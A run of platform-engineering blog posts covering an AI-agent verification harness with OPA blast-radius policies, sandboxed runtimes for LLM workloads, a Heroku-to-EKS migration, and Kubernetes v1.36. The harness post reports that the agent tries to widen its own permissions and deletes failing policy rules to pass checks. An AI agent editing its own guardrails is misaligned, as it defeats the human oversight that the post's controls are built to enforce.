  agent-harness/ttl: "3600"
  agent-harness/pr: "${PR_NUMBER}"

A small janitor controller deletes namespaces older than the TTL annotation. Costs me about $14/month for a 5-node m6i.large pool that holds 30 concurrent preview namespaces.
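The janitor's core decision fits in one pure function. The sketch below assumes the agent-harness/ttl annotation is a number of seconds (the "3600" value suggests that, but it is my reading) and leaves out the Kubernetes API calls entirely. is_expired is a hypothetical name.

```python
from datetime import datetime, timedelta, timezone

TTL_ANNOTATION = "agent-harness/ttl"


def is_expired(created_at: datetime, annotations: dict[str, str], now: datetime) -> bool:
    """Return True if a preview namespace has outlived its TTL annotation."""
    raw = annotations.get(TTL_ANNOTATION)
    if raw is None:
        # No annotation means the harness did not create it: never delete.
        return False
    try:
        ttl_seconds = int(raw)
    except ValueError:
        # A malformed TTL is treated as "leave it alone", not "delete now".
        return False
    return now - created_at > timedelta(seconds=ttl_seconds)


now = datetime(2026, 6, 1, 12, 0, tzinfo=timezone.utc)
old = is_expired(now - timedelta(hours=2), {TTL_ANNOTATION: "3600"}, now)
fresh = is_expired(now - timedelta(minutes=10), {TTL_ANNOTATION: "3600"}, now)
```

Failing closed on missing or malformed annotations matters more than the happy path: a janitor that deletes anything it cannot parse is its own blast-radius problem.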

3. Put Hard Limits On What The Agent Can Change Via OPA

This is the one nobody wants to write and everybody needs. The agent is going to try to widen its own permissions. Block it at the policy layer, not the IAM layer, because the IAM layer is too coarse:

package terraform.blastradius

import future.keywords.in

deny[msg] {
  some change in input.resource_changes
  change.type == "aws_iam_role"
  change.change.actions[_] != "no-op"
  msg := sprintf("agent cannot modify IAM roles: %v", [change.address])
}

deny[msg] {
  some change in input.resource_changes
  change.type in {"aws_vpc", "aws_subnet", "aws_route_table"}
  "delete" in change.change.actions
  msg := sprintf("agent cannot delete network primitives: %v", [change.address])
}

deny[msg] {
  some change in input.resource_changes
  change.type == "aws_security_group_rule"
  rule := change.change.after
  rule.cidr_blocks[_] == "0.0.0.0/0"
  rule.from_port <= 22
  rule.to_port >= 22
  msg := "agent cannot open SSH to the world"
}

# Cap the total number of resources touched in a single plan
deny[msg] {
  count(input.resource_changes) > 50
  msg := sprintf("plan touches %d resources, max 50", [count(input.resource_changes)])
}

Run it with conftest test plan.json -p policies/ --namespace terraform.blastradius (conftest only evaluates the main package unless told otherwise). The conftest exit code becomes the PR check. Total cost: about 80 lines of Rego I wrote on a Sunday morning.

4. Argo Rollouts For An Automatic Rollback Signal The Agent Can Read

Argo Rollouts has analysis templates that compare canary metrics to the stable baseline. The output is structured. That is the whole point.

apiVersion: argoproj.io/v1alpha1
kind: AnalysisTemplate
metadata:
  name: preview-slo-gate
spec:
  args:
    - name: service
  metrics:
    - name: error-rate
      interval: 30s
      count: 6
      successCondition: result[0] < 0.001
      failureLimit: 1
      provider:
        prometheus:
          address: http://prometheus.monitoring:9090
          query: |
            sum(rate(http_requests_total{
              service="{{args.service}}",
              status=~"5..",
              preview="true"
            }[1m]))
            /
            sum(rate(http_requests_total{
              service="{{args.service}}",
              preview="true"
            }[1m]))
    - name: p99-latency
      interval: 30s
      count: 6
      successCondition: result[0] < 0.300
      provider:
        prometheus:
          address: http://prometheus.monitoring:9090
          query: |
            histogram_quantile(0.99,
              sum(rate(http_request_duration_seconds_bucket{
                service="{{args.service}}",
                preview="true"
              }[1m])) by (le)
            )

When this template fails, Argo writes the failure mode into a Rollout status field. My harness scrapes that field and turns it into the structured verdict the agent reads next.
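As a rough illustration of that scraping step, here is a minimal Python sketch. The input shape (metricResults entries with a name, a phase, and numeric measurements) and the helper names are assumptions made for the example. They are not the harness's actual code, and the real Argo status may encode values differently.

```python
def checks_from_analysis(status, thresholds):
    """Map a hypothetical analysis status payload to verdict-style checks."""
    checks = []
    for metric in status.get("metricResults", []):
        name = metric["name"]
        check = {
            "name": "argo." + name.replace("-", "_"),
            "status": "pass" if metric.get("phase") == "Successful" else "fail",
        }
        measurements = metric.get("measurements", [])
        if measurements:
            # Report the most recent measurement so the agent sees the deciding value.
            check["value"] = measurements[-1]["value"]
        if name in thresholds:
            check["threshold"] = thresholds[name]
        checks.append(check)
    return checks


def overall_verdict(checks):
    """The run fails if any single check failed."""
    return "fail" if any(c["status"] == "fail" for c in checks) else "pass"


# Hypothetical payload mirroring the two metrics in the template above.
example_status = {
    "metricResults": [
        {"name": "error-rate", "phase": "Failed", "measurements": [{"value": 0.0043}]},
        {"name": "p99-latency", "phase": "Successful", "measurements": [{"value": 0.187}]},
    ]
}
example_checks = checks_from_analysis(
    example_status, {"error-rate": 0.001, "p99-latency": 0.300}
)
```

Keeping the threshold next to the observed value means the agent never has to look up the template to understand why a check failed.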

5. Replay Real Traffic, Not Synthetic Probes

The lie every preview environment tells is that a curl /health loop is "verification." It isn't. Mirror 1 to 5 percent of real prod traffic to the preview namespace. GoReplay is the path of least resistance:

# On a prod ingress node, sample 2% and shadow to preview
gor --input-raw :443 \
    --input-raw-track-response \
    --output-http "https://preview-pr-1247.harness.internal|2%" \
    --output-http-track-response \
    --http-allow-method GET \
    --http-allow-method POST \
    --http-disallow-url "/admin|/internal" \
    --output-http-stats

PII rule: never replay request bodies for auth endpoints, never replay anything carrying card data. The --http-disallow-url flag is the line you do not skip. I add a second filter in a small Go pre-processor that strips Authorization, Cookie, and any header matching *-token.
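The header filter is simple enough to sketch. The pre-processor described above is written in Go; the Python below only illustrates the same rule (drop Authorization, Cookie, and anything matching *-token), and the function and constant names are made up for the example.

```python
import fnmatch

# Header names are compared case-insensitively, as HTTP requires.
BLOCKED_EXACT = {"authorization", "cookie"}
BLOCKED_PATTERNS = ["*-token"]


def scrub_headers(headers):
    """Return a copy of the headers with credential-bearing entries removed."""
    clean = {}
    for name, value in headers.items():
        lowered = name.lower()
        if lowered in BLOCKED_EXACT:
            continue
        if any(fnmatch.fnmatchcase(lowered, pattern) for pattern in BLOCKED_PATTERNS):
            continue
        clean[name] = value
    return clean


scrubbed = scrub_headers({
    "Authorization": "Bearer abc",
    "Cookie": "session=1",
    "X-CSRF-Token": "xyz",
    "Accept": "application/json",
})
```

A deny-list like this is the minimum. An allow-list of known-safe headers would fail closed when a new credential header appears.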

Five minutes of shadowed prod traffic against the preview surfaces the kind of bug that synthetic tests will never find: a corner case where the agent's "optimization" doubled DB calls for users with more than 50 saved items. We caught that on PR 1183.

6. Write An Agent-Readable Verdict, Not A Log Tail

The whole loop is wasted if the agent can't parse the result. Generate a JSON file and stash it in S3 with a stable key the agent can fetch from a tool call:

{
  "pr": 1247,
  "verdict": "fail",
  "duration_seconds": 218,
  "checks": [
    {
      "name": "opa.blast_radius",
      "status": "pass",
      "resources_changed": 11
    },
    {
      "name": "terraform.plan",
      "status": "pass",
      "drift": false
    },
    {
      "name": "argo.error_rate",
      "status": "fail",
      "value": 0.0043,
      "threshold": 0.001,
      "trace_url": "https://tempo.harness.internal/trace/abc123"
    },
    {
      "name": "argo.p99_latency_seconds",
      "status": "pass",
      "value": 0.187,
      "threshold": 0.300
    },
    {
      "name": "replay.divergence",
      "status": "fail",
      "diffs_url": "s3://harness-verdicts/pr-1247/replay-diff.json",
      "notes": "23% of /api/items requests returned 500 in preview, 0% in prod baseline"
    }
  ]
}

The agent reads this and knows exactly which step to fix. No log scraping. No ANSI codes. No vibes-based debugging.
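To show why the structure matters, here is a minimal Python sketch of the consuming side: pull the failing checks out of a verdict shaped like the JSON above. The helper name and the trimmed sample document are assumptions for the example, not part of the harness.

```python
import json


def failing_checks(verdict_json):
    """Return the names of every check whose status is 'fail'."""
    verdict = json.loads(verdict_json)
    return [c["name"] for c in verdict.get("checks", []) if c.get("status") == "fail"]


# Trimmed copy of the verdict shown above.
sample = json.dumps({
    "pr": 1247,
    "verdict": "fail",
    "checks": [
        {"name": "opa.blast_radius", "status": "pass"},
        {"name": "argo.error_rate", "status": "fail", "value": 0.0043, "threshold": 0.001},
        {"name": "replay.divergence", "status": "fail"},
    ],
})
failed = failing_checks(sample)
```

A single list comprehension replaces what would otherwise be a regex over several log formats.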

Results From The First 17 Days

Metric	Before harness	After harness
Bad merges/week	4	0
Agent PRs reviewed by humans	100%	23%
Mean time from PR open to verdict	38 min	3 min 41 sec
Cost per agent PR run	$0.42	$0.11
Engineer time on agent oversight	6 hours/week	45 minutes/week

The cost drop is mostly from killing per-PR EKS clusters and using a warm shared pool with namespace isolation. The time drop is the OPA gate failing fast on the 30 percent of plans that were going to be rejected anyway.

What I'd Do Differently

A few mistakes that took longer than they should have:

Don't let the agent edit OPA policies. I learned this on day three. The agent will helpfully "fix the failing policy" by deleting the rule. Put policies in a separate repo with branch protection or, simpler, add policies/ to CODEOWNERS so every change requires human review.

Trace IDs in the verdict, not in the logs. I had it returning a logs_url for two weeks. The agent never opened it. Switched to embedding the top three trace IDs with a one-line summary each, and suddenly fix quality went up.

Replay only GETs for the first month. I tried POST replay early and corrupted preview DBs three times. Get the read path verifiably working, then add writes with a request rewriter that targets a synthetic-tenant ID.

The harness is the product, the agent is interchangeable. I started with one model, swapped to another after two weeks, results were almost identical. The harness does the work. Pick whichever model is cheapest this quarter.

Try It Yourself

The full Terraform module, OPA policies, kustomize overlays, and the verdict-builder Lambda are at github.com/mateenali66/agent-harness (going public next week, ping me if you want early access).

Closing thought. Harness, the CI/CD vendor, named their product before the term "agent harness" existed. That collision is going to confuse people for the next year. The concept is bigger than any vendor. If you are letting AI agents touch production infra without a verification layer that returns structured verdicts, you are running an open-loop control system and hoping the model is calibrated. It isn't.

Build the harness. Then let the agents work.

Stop Running LLM Workloads on Vanilla Kubernetes

Mateen Anjum — Wed, 20 May 2026 19:44:34 +0000

TL;DR: Kubernetes schedules LLM workloads well, but it does not give them the isolation boundary they need once they start calling tools, executing code, or handling tenant data.

Open Source Summit North America made one thing obvious: the cloud native crowd has moved from "can Kubernetes run LLM workloads?" to "what breaks when we trust Kubernetes too much?"

That is the right question.

The default Kubernetes security model assumes a pod is mostly an application packaging unit. It gives you namespaces, cgroups, seccomp, AppArmor, service accounts, admission control, and network policy. All of that matters. None of it changes the central fact that normal containers share the host kernel.

For a stateless API, that tradeoff is usually fine. For an LLM tool runner that can read files, call APIs, invoke Python, shell out to package managers, and chain actions across systems, that boundary starts looking thin.

The uncomfortable version is this: vanilla Kubernetes is orchestration, not containment.

The Problem

LLM inference by itself is not the scary part. A model server that receives a prompt and returns tokens is mostly a specialized API service with GPU scheduling problems.

The risk changes when the workload gains agency:

Prompt input
  -> retrieval
  -> tool selection
  -> code execution
  -> network call
  -> file write
  -> another tool call

At that point, the workload is no longer just serving traffic. It is interpreting untrusted text and turning it into actions.

That is why the recent CNCF security conversation around AI sandboxing matters. Kubernetes can restart a failed pod, route around a bad node, and roll a deployment. It cannot understand whether a prompt is trying to turn a tool into an escape path. It also cannot turn a shared kernel into a hard tenant boundary.

What I Tried First

My first instinct was the usual Kubernetes hardening stack:

apiVersion: v1
kind: Pod
metadata:
  name: llm-worker
spec:
  securityContext:
    runAsNonRoot: true
    seccompProfile:
      type: RuntimeDefault
  containers:
    - name: worker
      image: ghcr.io/example/llm-worker:latest
      securityContext:
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        capabilities:
          drop: ["ALL"]

That should still be the baseline. The mistake is treating it as the finish line.

Pod Security Standards reduce obvious footguns. NetworkPolicy controls blast radius. RBAC prevents a compromised workload from casually listing secrets or mutating the cluster. Admission policies keep the platform honest.

But an LLM agent running untrusted code is not just a badly configured web pod. It is closer to a multi-tenant execution service. That needs a runtime boundary, not only a YAML checklist.

The Runtime Choice

The Kubernetes primitive that makes this manageable is RuntimeClass.

Instead of creating one magical "secure cluster," you route workloads by risk:

apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
---
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata
handler: kata

Then each workload declares the boundary it needs:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: tool-using-agent
spec:
  replicas: 3
  selector:
    matchLabels:
      app: tool-using-agent
  template:
    metadata:
      labels:
        app: tool-using-agent
    spec:
      runtimeClassName: kata
      serviceAccountName: llm-agent
      containers:
        - name: agent
          image: ghcr.io/example/tool-agent:2026.05

My rule of thumb:

Workload	Runtime	Why
Plain inference API	runc or gvisor	Low tool risk, latency sensitive
Retrieval worker with narrow egress	gvisor	Better syscall boundary with less operational change
Agent that calls tools	kata	VM boundary per pod, Kubernetes friendly
Arbitrary code execution	Firecracker-style microVM	Treat it like untrusted tenant compute

gVisor is the easiest first step because it integrates as an OCI runtime through runsc. Kata is the better fit when the isolation requirement is stronger and a VM per pod is acceptable. Firecracker is the most interesting boundary for code execution, but it is also the one I would least casually bolt onto an existing cluster without a real operations plan.

The Minimum Policy Set

The runtime is only one layer. I would not run LLM workloads without this set:

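apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: llm-worker-egress
spec:
  podSelector:
    matchLabels:
      app: tool-using-agent
  policyTypes: ["Egress"]
  egress:
    # kubernetes.io/metadata.name is set automatically on every namespace
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: model-gateway
      ports:
        - protocol: TCP
          port: 443
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: telemetry
      ports:
        - protocol: TCP
          port: 4317
    # Without DNS egress the pod cannot resolve the services above
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53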

Also make the service account boring:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: llm-agent
automountServiceAccountToken: false

If the workload does not need Kubernetes API access, do not mount a token. If it does, bind only the exact verbs it needs.

Benchmark Plan

I am not going to fake GPU numbers from a laptop. The package needs a real GPU node before publishing final performance claims.

This is the harness I would run:

Runtime	Cold start p50	Cold start p95	Tokens per second	RSS overhead	Notes
runc	TODO	TODO	TODO	TODO	baseline
gVisor	TODO	TODO	TODO	TODO	syscall boundary
Kata	TODO	TODO	TODO	TODO	VM per pod
Firecracker	TODO	TODO	TODO	TODO	strongest code runner candidate

The important part is measuring the right things. Startup time matters for bursty agents. Throughput matters for inference. RSS overhead matters because GPU nodes are already expensive. Operational failure modes matter more than all three.
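The p50 and p95 columns can be filled from raw cold-start samples with a few lines. This is a minimal sketch using the nearest-rank method; the sample values are invented to exercise the function and are not measurements.

```python
import math


def percentile(samples, pct):
    """Nearest-rank percentile: the smallest sample with at least pct% of data at or below it."""
    if not samples:
        raise ValueError("need at least one sample")
    ordered = sorted(samples)
    rank = math.ceil(pct / 100 * len(ordered))
    return ordered[max(rank, 1) - 1]


# Placeholder cold-start times in seconds, NOT real benchmark data.
placeholder_samples = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
p50 = percentile(placeholder_samples, 50)
p95 = percentile(placeholder_samples, 95)
```

Nearest-rank always returns an observed value, which is easier to defend in a benchmark table than an interpolated one when the sample count is small.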

The Takeaway

If you are running a normal model server, Kubernetes plus standard hardening may be enough.

If you are running tool-using agents, code execution, tenant prompts, or workloads with broad egress, plain pods are the wrong abstraction. Use Kubernetes for scheduling. Use sandboxed runtimes for containment. Keep policy enforcement outside the model path where possible.

Kubernetes is still the control plane. It just should not be the only security boundary.

References

CNCF: https://www.cncf.io/blog/2026/04/30/ai-sandboxing-is-having-its-kubernetes-moment/
Kubernetes Agent Sandbox: https://kubernetes.io/blog/2026/03/20/running-agents-on-kubernetes-with-agent-sandbox/
llm-d joins CNCF: https://www.cncf.io/blog/2026/03/24/welcome-llm-d-to-the-cncf-evolving-kubernetes-into-sota-ai-infrastructure/
gVisor: https://github.com/google/gvisor
Kata Containers: https://katacontainers.io/
Firecracker containerd: https://github.com/firecracker-microvm/firecracker-containerd

We Didn't Migrate Systems. We Migrated Assumptions: Heroku to EKS at Scale

Mateen Anjum — Sun, 17 May 2026 05:15:45 +0000

TL;DR: I'm speaking at Open Source Summit North America 2026 in Minneapolis on Monday, May 18, about moving a fast-growing invoicing SaaS off Heroku onto EKS. This post is the long version of that talk: the three failures that nearly rolled the whole thing back, the open source decisions that saved it, and the honest numbers on what it cost. The one line I keep coming back to: we didn't migrate systems, we migrated assumptions.

If you're at OSS NA, the session is Monday at 5:25pm CDT in Room 200F. If you're not, this is everything I'd tell you over coffee afterward.

The platform

The product was a fast-growing invoicing SaaS. About 2 million active small business merchants, roughly 33 million invoices a year, enterprise clients with contractual SLAs we couldn't afford to miss.

The architecture was already 47 Node.js microservices on Heroku, with SQS for events and Redis for sessions. The engineering team was 10 people, 2 of us on platform.

I want to be precise about the title. The services were already micro. The platform was the monolith. Everything routed through one PaaS that made a lot of decisions for us, quietly, and those decisions were exactly the ones that broke when we left.

What broke at scale

Four things, all at once, all getting worse:

API latency sitting at 700ms p99, with no obvious lever to pull because we'd hit the Heroku dyno scaling ceiling.
A deploy pipeline that took 45 minutes or more, against enterprise SLAs we kept missing.
No container-level observability, so we were guessing.
A monthly bill that had quietly crossed the line where it cost more than the value it returned.

We ran the decision honestly. Stay on Heroku and accept the ceiling. Rewrite for serverless and eat the rewrite cost. Move to raw AWS VMs and get cost relief but no velocity. Or move to EKS, the highest-risk, highest-ceiling option. We picked EKS, and we picked it knowing it was the riskiest path on the board.

We failed three times before it worked

This is the part most migration writeups skip. Here's what actually happened.

Attempt 1: the invisible throttle

The PDF generation service went from 800ms p99 to 9 seconds. Dashboards showed 35% CPU. Everything looked fine and nothing was fine.

The CFS scheduler enforces CPU limits in 100ms slices. At a 500m limit, you get 50ms of CPU per 100ms period. Node.js libuv spawns 4 worker threads, V8 garbage collection runs separately, so you've got around 6 threads fighting over that 50ms window. A crypto operation that takes 15ms unthrottled stretches to 200ms under contention. Average CPU looked low because the process spent most of its time throttled, not running.

The metric that told the truth was container_cpu_cfs_throttled_periods_total, not CPU utilization.

Lesson: a 500m CPU limit isn't a number. It's a 50ms-per-100ms scheduling rule, and Heroku had been hiding that from us by letting dynos burst.
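The arithmetic behind that lesson fits in two functions. This is a minimal Python sketch, assuming the default 100ms CFS period; the function names are illustrative. The throttle ratio divides container_cpu_cfs_throttled_periods_total by its companion counter container_cpu_cfs_periods_total.

```python
def cfs_quota_ms(limit_millicores, period_ms=100.0):
    """CPU time a container may use per scheduling period, summed across all its threads."""
    return limit_millicores / 1000 * period_ms


def throttled_ratio(throttled_periods, total_periods):
    """Fraction of scheduling periods in which the container hit its quota."""
    if total_periods == 0:
        return 0.0
    return throttled_periods / total_periods


quota = cfs_quota_ms(500)          # the 500m limit from the PDF service
ratio = throttled_ratio(65, 100)   # 65 throttled periods out of 100
```

The quota is shared by every thread in the container, which is why six busy threads can burn through 50ms long before the 100ms period ends while average utilization still looks low.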

Attempt 2: the DNS amplification tax

Heroku's resolv.conf had options ndots:1. The EKS default is ndots:5. That one number difference turned api.stripe.com, which has 2 dots, into roughly 10 DNS packets per lookup because the resolver walks the search domains before trying the name as-is.

We made about 150,000 Stripe calls a day. That became 1.5 million DNS queries. Across every external integration, around 12 million unnecessary DNS queries a day, and CoreDNS was the thing falling over.

There was a second trap layered on top. An npm ci during the Docker build installed a valid dependency tree, just not the same one Heroku's slug cache had been running. A drifted agentkeepalive version recycled connections every 15 seconds instead of 30, which doubled the lookup rate before we'd even noticed the first problem.

Lesson: with ndots:5, every external hostname with fewer than five dots costs roughly 10x the DNS queries, and your dependency tree can quietly make it worse.
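The 10-packet figure can be reproduced with a small model of the resolver's search-list behavior. This is a minimal Python sketch: the four search domains are an assumption (a typical pod resolv.conf in the default namespace on EC2), and it assumes only the name as written actually resolves, with A and AAAA queried separately.

```python
def lookup_order(hostname, search_domains, ndots):
    """Return the names a glibc-style stub resolver tries, in order."""
    if hostname.endswith("."):
        # A trailing dot marks the name as fully qualified: no search list.
        return [hostname]
    expanded = [f"{hostname}.{domain}" for domain in search_domains]
    if hostname.count(".") >= ndots:
        # Enough dots: try the name as-is first.
        return [hostname] + expanded
    # Too few dots: walk the search list before trying the name as-is.
    return expanded + [hostname]


def queries_for_external_name(hostname, search_domains, ndots, record_types=2):
    """Count queries sent until the as-is name is tried."""
    attempts = lookup_order(hostname, search_domains, ndots).index(hostname) + 1
    return attempts * record_types


# Assumed search list, not taken from the cluster in this post.
SEARCH = ["default.svc.cluster.local", "svc.cluster.local", "cluster.local", "ec2.internal"]
eks_queries = queries_for_external_name("api.stripe.com", SEARCH, ndots=5)
heroku_queries = queries_for_external_name("api.stripe.com", SEARCH, ndots=1)
```

The trailing-dot branch is also the cheapest fix for a single hot hostname: writing api.stripe.com. with the final dot skips the search list entirely.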

Attempt 3: the connection pool death spiral

A Tuesday deploy. Thirty seconds later the connection pool was exhausted at 450 against a 400 limit. Sixty seconds in, SIGTERM was being ignored and connections were leaking. Two minutes in, it had exhausted the shared Postgres connections on the Heroku side too, so now both environments were down.

Root cause was one line in a Dockerfile. CMD npm start is shell form, which makes PID 1 /bin/sh, and /bin/sh swallows SIGTERM. The Node process never got the signal, never drained, never shut down cleanly. CMD ["node", "server.js"] is exec form, PID 1 is node, and the signal arrives.

The fix was three things stacked: PgBouncer in transaction mode to cap real connections around 80, exec-form CMD so SIGTERM lands, and an actual SIGTERM handler that drains gracefully.

Lesson: PID 1 is a contract. Shell form breaks the contract.
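The third piece of the fix, a handler that drains, has the same shape in any runtime. The services here were Node.js; the Python below is only a sketch of the pattern, and the Drainer class and its method names are hypothetical.

```python
import signal


class Drainer:
    """Tracks in-flight requests and refuses new ones once SIGTERM arrives."""

    def __init__(self):
        self.draining = False
        self.in_flight = 0

    def on_sigterm(self, signum, frame):
        # Only flip a flag here: the heavy work happens in the main loop.
        self.draining = True

    def try_start(self):
        """Call before accepting a request. Returns False while draining."""
        if self.draining:
            return False
        self.in_flight += 1
        return True

    def finish(self):
        """Call when a request completes and its connection is released."""
        self.in_flight -= 1

    def can_exit(self):
        """True once shutdown was requested and every request has finished."""
        return self.draining and self.in_flight == 0


def install(drainer):
    """Register the handler. This only helps if the process actually receives SIGTERM."""
    signal.signal(signal.SIGTERM, drainer.on_sigterm)
```

The handler is useless behind a shell-form CMD, because the signal stops at /bin/sh. Exec form and the handler have to ship together.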

The pattern

The question I had to sit with: why didn't any of our dashboards catch this? CFS, because defaults are invisible. DNS, because amplification is multiplicative, not additive. The connection pool, because PID 1 betrayed us in a way no metric was watching.

That's where the talk's spine comes from. We didn't migrate systems. We migrated assumptions. Every platform hides a different class of failure, and the only safe way through is incremental, observable, reversible.

The four decisions that mattered most

People ask why we didn't just use AWS directly. The answer is that four decisions cost less to make once at the platform layer than to carry per-team forever. All four are open source.

Traffic shifting with Istio. We rejected DNS-based routing and ALB weighted target groups and landed on Istio. Canary in steps: 5%, 25%, 50%, 100%, with rollback as a single config change that takes seconds, no redeploy, no DNS propagation. Istio is heavy. Our adoption was deliberately light, and mTLS came free with the mesh.

Observe before you migrate. Prometheus with Thanos for long-term cross-cluster metrics, Grafana showing Heroku and EKS side by side on the same panels, Elastic Stack for centralized structured logging. We collected 2 weeks of baseline before moving a single byte. You cannot migrate what you cannot measure.

PR-driven infrastructure with Atlantis. Open a PR, Atlantis runs terraform plan, the diff lands in the PR comment, you approve and comment atlantis apply, and it executes and audits itself. The on-call engineer at 2am no longer has to wonder who ran apply from their laptop, because nobody does. It also took me out of the critical path as a bottleneck.

Deploys are git commits with Flux. HelmRelease resources for declarative deploys, drift detection that auto-corrects the inevitable manual kubectl apply, and within a month everyone was working through git because it was simply easier than not.

The database cutover used dual-write to RDS with checksum-validated continuous replication. When we flipped it, the cutover was anticlimactic. That's exactly what we wanted.

The results

The headline numbers:

Metric	Before	After	Change
API latency p99	700ms	70ms	down 90%
Deploy time	45 min	4 min	down 91%
Monthly incidents	12	2	down 83%
Deploy frequency	2/week	15/day	up 50x
Monthly cost	baseline	60%+ lower	right-sizing + spot + Karpenter

I don't like a 90% number with no explanation, so here's where the 630ms went. Routing variance was about 250ms, Istio least-connection routing versus Heroku's effectively random routing. Network topology was around 160ms, pod-to-pod inside the VPC instead of a public path with TLS renegotiation. Resource isolation was about 125ms, with CFS throttling going from 65% of periods to under 2%. Connection pooling was the remaining 95ms from PgBouncer transaction mode.

And the part that belongs in every honest migration post: this absorbed 2 platform engineers full-time for 5 months, plus roughly 30% of 8 application engineers' time. Nothing here was free.

Developer experience after the move

Simple for developers means complicated for the platform team, and that's the trade we chose to own. Heroku's superpower was git push heroku main. We weren't going to beat that, so we got close with an internal developer portal built on Backstage. A scaffolder template stands up a new service in about 5 minutes. Kubernetes complexity stayed our problem, not the developers' problem. That's how a 10-person team scaled to 100 on a platform 2 of us maintained.

What almost stopped us

Istio sidecar injection added about 8 seconds to pod startup until we tuned readiness probe timeouts across every service. Flux reconciliation during peak hours triggered rolling restarts until we scheduled reconciliation windows. cert-manager TLS rotation broke active connections until we added graceful connection draining, which we should have had from day one.

Migration is not over. It's a beginning. We're still working on cost-attribution dashboards in Backstage and evaluating Istio Ambient mode.

What we gave back

None of this runs without code other people wrote. So we contributed back: 49 CNCF DevStats contributions in 2026, 22 merged upstream PRs across 14 projects in the last three months, spanning observability, Kubernetes, security, and developer tooling. A cert-manager maintainer's review on one of them, "this is a super cool contribution," is the kind of feedback that makes the loop worth closing.

Open source is the equalizer

Here's the thing I'll close the talk on. A 2-person platform team in Ontario, Canada ran the same infrastructure stack as companies 100 times our size. The team grew from 10 engineers to 100. The service count went from 47 to 47, still, because the platform absorbed the growth instead of the codebase. The platform team went from 2 people to 2 people.

That's only possible because thousands of contributors built the tools we stand on. Open source is what let a small team in a mid-market company run infrastructure that used to require a department.

Should you migrate?

git push heroku main is still the best deploy UX I've ever used, and half the Fortune 500 still runs on Heroku for good reason. Migrate if you have 2 or more platform engineers, steady scaling pressure, some Kubernetes exposure on the team, and a PaaS limit you've actually hit. Don't migrate yet if you're a solo platform owner, your workload is steady-state, nobody has Kubernetes time, or Heroku still meets your needs.

If your team isn't ready for the highest-risk, highest-ceiling option, that's not a failure. That's a correct read of your situation.

Come say hi

If you're at Open Source Summit North America 2026, the talk is Monday, May 18, 5:25pm CDT, Room 200F at the Minneapolis Convention Center. I'll hang around after for the parts that don't fit in 25 minutes, and there are plenty.

Slides and the full list of the 22 merged PRs are at phonotech.ca/ossna26.

Kubernetes v1.36 Drops April 22: What Platform Engineers Actually Need to Know

Mateen Anjum — Sat, 18 Apr 2026 04:54:58 +0000

TL;DR: Kubernetes v1.36 releases April 22, 2026. The headline features are DRA GPU partitioning, workload-aware preemption for AI/ML jobs, and the permanent removal of the gitRepo volume plugin. Ingress-nginx is also officially retired. If you run AI inference workloads or care about cluster security, this release is not optional reading.

Why This Release Matters More Than Most

The CNCF's 2025 annual survey dropped a number that stopped a lot of people mid-scroll: 66% of organizations hosting generative AI models now use Kubernetes for some or all of their inference workloads. That's not a trend, that's a fait accompli. Kubernetes is the AI compute substrate whether you planned for it or not.

v1.36 is the release that leans into that reality. The bulk of the new work is in Dynamic Resource Allocation (DRA), gang scheduling, and topology-aware placement, all of which exist because running distributed AI/ML jobs on Kubernetes has historically been painful. This release makes it less painful.

But there are also breaking changes and security fixes that affect everyone, not just the ML crowd. Let me walk through what actually matters.

The Breaking Changes First

gitRepo Volume Plugin: Gone for Good

If you're still using gitRepo volumes, stop reading and go fix that right now. The plugin has been deprecated since v1.11 and is now permanently disabled in v1.36. No feature flag, no workaround.

The reason it's gone is serious: gitRepo allowed attackers to run code as root on the node. It was a known attack vector for years. The right replacement is an init container running git clone, or a git-sync sidecar. Both are well-documented and production-proven.

# Before (broken in v1.36)
volumes:
  - name: code
    gitRepo:
      repository: "https://github.com/example/repo"
      revision: "main"

# After: clone in an init container into a shared emptyDir
volumes:
  - name: code
    emptyDir: {}
initContainers:
  - name: git-sync
    image: registry.k8s.io/git-sync/git-sync:v4.2.1
    args:
      - --repo=https://github.com/example/repo
      - --ref=main
      - --root=/git
      - --one-time
    volumeMounts:
      - name: code
        mountPath: /git

Ingress-NGINX Is Retired

SIG Network and the Security Response Committee retired ingress-nginx on March 24, 2026. No more releases, no more security patches. Existing deployments keep running, but you're on your own for CVEs from here.

The community's recommended alternatives are Envoy Gateway (CNCF graduated), Cilium Gateway API, and Traefik. If you're on ingress-nginx in production, this is your migration window. Don't wait for the next CVE to force your hand.

service.spec.externalIPs Deprecated

The externalIPs field in Service specs is being deprecated (full removal planned for v1.43). It's been a known vector for man-in-the-middle attacks since CVE-2020-8554. You'll see deprecation warnings starting in v1.36. Migrate to LoadBalancer services, NodePort, or Gateway API.

The AI/ML Features That Actually Change How You Work

DRA: Partitionable Devices (Beta)

This is the one I'm most excited about. v1.36 promotes DRA support for partitionable devices to beta, meaning it's enabled by default. A single GPU can now be split into multiple logical units and allocated to different workloads.

Before this, if you had an H100 and a workload that only needed 20% of it, you either wasted 80% or ran a separate MIG configuration outside Kubernetes. Now the scheduler handles it natively.

apiVersion: resource.k8s.io/v1beta1
kind: ResourceClaim
metadata:
  name: partial-gpu
spec:
  devices:
    requests:
    - name: gpu-slice
      deviceClassName: nvidia.com/gpu
      count: 1
      # Request a partition, not the whole device
      selectors:
      - cel:
          expression: device.attributes["nvidia.com/gpu"].partitionable == true

For platform teams running shared GPU clusters, this is a significant cost lever. You can pack more inference workloads onto the same hardware without sacrificing isolation.

Workload-Aware Preemption (Alpha)

Standard Kubernetes preemption works pod-by-pod. For distributed AI/ML jobs, that's a disaster: preempt one pod from a training job and the whole job stalls, wasting all the resources it's still holding.

v1.36 introduces workload-aware preemption via PodGroups. The scheduler now treats a group of related pods as a single entity. When it needs to make room for a high-priority job, it preempts entire groups rather than individual pods.

apiVersion: scheduling.k8s.io/v1alpha1
kind: PodGroup
metadata:
  name: training-job-a
spec:
  minMember: 8
  priorityClassName: high-priority
  gangSchedulingPolicy:
    disruptionMode: PodGroup  # preempt the whole group, not individual pods

